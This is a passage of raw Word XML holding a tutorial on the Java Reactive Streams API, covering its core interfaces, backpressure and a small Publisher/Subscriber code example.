        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It provides a standard for asynchronous data streams and helps systems to handle large amounts of data efficiently and without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAFD1A5" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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9AC31F0">
          <v:rect id="_x0000_i2273" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A6FB2" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Key Components of the Reactive Streams API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726BE7D0"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The Reactive Streams specification defines a set of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>four core interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are essential for working with asynchronous data streams. These interfaces are designed to facilitate </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing consumers of a data stream to signal when they are able to process more data. This ensures that a system does not become overwhelmed by an excess of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A902FC"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Publisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE45117" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Publisher is the source of the data. It represents a stream that can publish data items to one or more subscribers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807CD7F" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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It is responsible for emitting elements to the subscribers when they are ready to receive them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6381C9" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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A Publisher can be thought of as a data source, producing a series of items over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76F794" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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It follows a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push-based model</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning it pushes data to subscribers when they signal readiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3104B066"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Subscriber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF00569" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Subscriber is the consumer of the data. It is responsible for handling the data emitted by a Publisher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C4424" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Subscriber processes each item emitted by the Publisher and can signal back to the Publisher if it can process more items (backpressure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9EFF5C" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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A Subscriber defines methods for receiving data (onNext), handling errors (onError), and acknowledging completion (onComplete).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB71D93"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Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F6703D" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Subscription represents the relationship between a Publisher and a Subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C93ED" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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It allows the Subscriber to request data and signal backpressure to the Publisher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803B4AE" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Subscription provides methods like request(long n) to specify how many elements the Subscriber wants to receive and cancel() to stop receiving data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013738ED"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Processor&lt;T, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F9B0A" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Processor is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> type of Subscriber and Publisher. It acts as an intermediary that can both process and forward data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B984A" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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lastRenderedPageBreak/>
        <w:t>It allows the transformation of data from one form to another and can be used to process a stream while still being able to emit results to other subscribers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E2307" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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A Processor can transform, filter, or manipulate data as it passes through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA29CB5" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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E04993B">
          <v:rect id="_x0000_i2274" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862AB70" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Flow of Data in Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C57BFE0"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Publisher creates a stream of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D68EC90" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Publisher generates data asynchronously and sends it to any Subscriber that subscribes to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D481147"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Subscriber subscribes to the Publisher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB96C7" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Subscriber expresses interest in the data produced by the Publisher by calling Publisher.subscribe(Subscriber).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D641CCB"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Subscriber requests data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1830B" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Upon subscribing, the Subscriber can request a specific number of items from the Publisher using the request(long n) method. This is how </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is implemented, allowing the Subscriber to request data when it is ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD1B09"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Publisher emits data to Subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7102DA2B" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The Publisher emits data items as the Subscriber requests them. It calls Subscriber.onNext(T item) for each emitted item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578A2C7"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Completion or Error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50096936" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Once the Publisher finishes emitting data, it signals completion via the onComplete() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141609F2" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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If an error occurs, the Publisher calls the onError(Throwable throwable) method on the Subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C884DC6" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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1774C7E">
          <v:rect id="_x0000_i2275" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="041C7C00" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CDC206"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Backpressure is a crucial concept in Reactive Streams. It refers to the ability of a Subscriber to signal to the Publisher that it cannot handle data at the current rate. The Subscriber can request a specific number of items at a time, preventing the Publisher from overwhelming it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17993899"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Backpressure is achieved through the request(long n) method in the Subscription interface. The Subscriber can use this method to request only a specific number of items, thus controlling the flow of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D05F1"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079EFE1"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If a Subscriber is processing data too slowly, it can request fewer items at a time to prevent being overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F451FF"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If the Subscriber is capable of processing data quickly, it can request more items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA7383" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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8BE525D">
          <v:rect id="_x0000_i2276" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E3431" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Example of Reactive Streams in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D952034"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Here’s an example of how you can use the Reactive Streams API in Java with Publisher, Subscriber, and Subscription.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D015403"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import org.reactivestreams.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1700F14D" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A35D444"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class MyPublisher implements Publisher&lt;Integer&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1CFE83"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private final int[] data = {1, 2, 3, 4, 5};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C97D8" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503A1268"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE110EC"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public void subscribe(Subscriber&lt;? super Integer&gt; subscriber) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B531236"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subscriber.onSubscribe(new MySubscription(subscriber, data));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE91B6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758C2C5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334B644" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6841191B"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class MySubscription implements Subscription {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246D08D0"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private final Subscriber&lt;? super Integer&gt; subscriber;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7CB8A"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private final int[] data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E48148C"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private int index = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E490729" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A4BAF6"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public MySubscription(Subscriber&lt;? super Integer&gt; subscriber, int[] data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A54E01"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this.subscriber = subscriber;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AE3FA7"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this.data = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCCA17D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045C1E9E" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0F3D95"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBA6116"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public void request(long n) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B484F"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for (long i = 0; i &lt; n &amp;&amp; index &lt; data.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6881C4D4"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subscriber.onNext(data[index++]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568F9D1"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3744A9FB"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if (index == data.length) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6039E0F7"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subscriber.onComplete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27785B51"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F54085E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D1E519" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404EDFF3"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF24E63"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public void cancel() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5EF06"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 Cancel subscription logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FA8D2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C72DB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126F0B10" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49080D93"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class MySubscriber implements Subscriber&lt;Integer&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD930C"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF1A9D"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public void onSubscribe(Subscription subscription) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BACB80D"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subscription.request(2); // Request 2 items at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D9B58"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD69E4" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37343176"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A4957"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public void onNext(Integer item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABC87C3"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System.out.println("Received: " + item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB13907"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E59EAD" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E054A95"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B1A28"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public void onError(Throwable t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F75D41"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System.err.println("Error: " + t.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC14F99"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1750E9" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C87DA8D"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D8403F"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public void onComplete() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D256F74"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System.out.println("Data stream completed.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60318251"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666151B6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E88AFB9" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCA28AC"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public class ReactiveStreamsExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12870782"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6137C278"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MyPublisher publisher = new MyPublisher();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C50EF"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MySubscriber subscriber = new MySubscriber();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4629A469" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469523D7"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publisher.subscribe(subscriber); // Subscriber subscribes to the publisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CC4D2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D67A4B3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C263CE6" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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86ABCC3">
          <v:rect id="_x0000_i2277" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAFD2E" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Advantages of Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF74FA"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Asynchronous Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Reactive Streams API provides non-blocking, asynchronous processing, which helps to handle large amounts of data efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C75530"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Backpressure Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides a built-in mechanism for backpressure, which ensures that a Publisher does not overwhelm a Subscriber with too much data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C1662"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Composability</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reactive Streams allows for easy composition of different operators (such as map, filter, flatMap, etc.) to transform and process streams of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F93A8DB"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Interoperability</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows different reactive libraries (like RxJava, Project Reactor, Akka Streams) to communicate seamlessly since they all follow the same Reactive Streams specification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC1D21E" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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1D84BCB">
          <v:rect id="_x0000_i2278" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6ACC7" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313F2D01" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
